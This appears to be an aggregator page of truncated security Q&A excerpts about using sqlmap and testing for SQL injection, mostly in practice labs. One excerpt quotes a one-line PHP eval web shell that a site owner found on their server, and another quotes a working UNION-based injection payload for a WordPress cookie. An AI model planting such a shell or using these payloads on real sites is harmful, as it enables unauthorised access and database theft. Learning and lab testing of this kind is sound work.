Collaborate Disseminate
I have found three files with name as below:
a.phpfile.txt
b.phpfile.txt
c.phpfile.txt
when i open, each file contained with the following code:
<?php @eval($_POST[x]);
I have deleted all the pages from my website, but i am ne… Continue reading .php code in .txt file with eval() function [duplicate]
I’m automating SQL injection using sqlmap. Is there someone who managed to parse sqlmap console output to only report critical findings (vulnerable pages to SQL injection)?
The tool doesn’t support output as JSON, and running the tool as A… Continue reading SQLmap automation
I am trying to understand the SQLi so I ran SQLMap with ‘-vvv’ parameter
4: Show also HTTP requests.
I did scan one of the vulnerable and ‘free to hack’ sites.
In one of the requests sent, the response from SQLmap was:
[22:25:10]… Continue reading SQLmap finds injectable ‘id’ parameter but the response is ‘Internal Server Error’
In order to access the login page of a webpage I have to add to the HTTP request header the following two parameters:
X-Forwarded-For: 192.168.32.3
Change the user-agent field value
Thus, for instance, if we want to test the website fo… Continue reading How can I change HTTP header parameters to test a website with automatic tools? [closed]
I haven’t used sqlmap with this complex of a web app/request. I believe I have a SQLi vulnerability in my http header referer based on a vulnerability scan and a BurpSuite active scan so I want to validate it and establish a proof of conce… Continue reading Unable to provide correct syntax to sqlmap – post query parameters confusing me and sqlmap
I’m using an existing exploit which calls for a cookie called wp_sap to be set with the following value:
["1650149780′)) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
This works great manually. Now, I’d like to be ab… Continue reading SQLMap Cookie Injectioin with Working Manual SQLi
I am learning SQLi using sqlmap and xampp.
I set up my lab the same way as per tutorial but when I run
sqlmap.py -u “http://localhost/bwapp/sqli_1.php?title=1*”
the error got 302 redirected to
http://localhost:80/bwapp/login.php
I have been trying to make sqlmap test the username parameter in a fake login page that uses basic authentication. However I cannot make it test the Authentication header via the asterisk trick:
sqlmap –auth-type "BASIC" –auth-… Continue reading Can sqlmap test for SQL injection in Basic Authentication?
I am trying to perform sqlmap locally and testing my website
When I run vulnerability scanner, it shows SQL injection error with HTTP like this
GET /index.php/search/FB3hw7”””’/assets/assets/assets/assets/assets/assets/assets/assets/a… Continue reading Sqlmap asking for query String
I’ve been playing around with sqlmap and I’ve notice that it creates a hidden folder named:
/%mycomputer%/.sqlmap/output
where inside, it also creates a folder for every sql injection test:
www.example.1
www.example.2
Can I store the… Continue reading SQLMap: How to create a .sqlite local copy of the compromised database?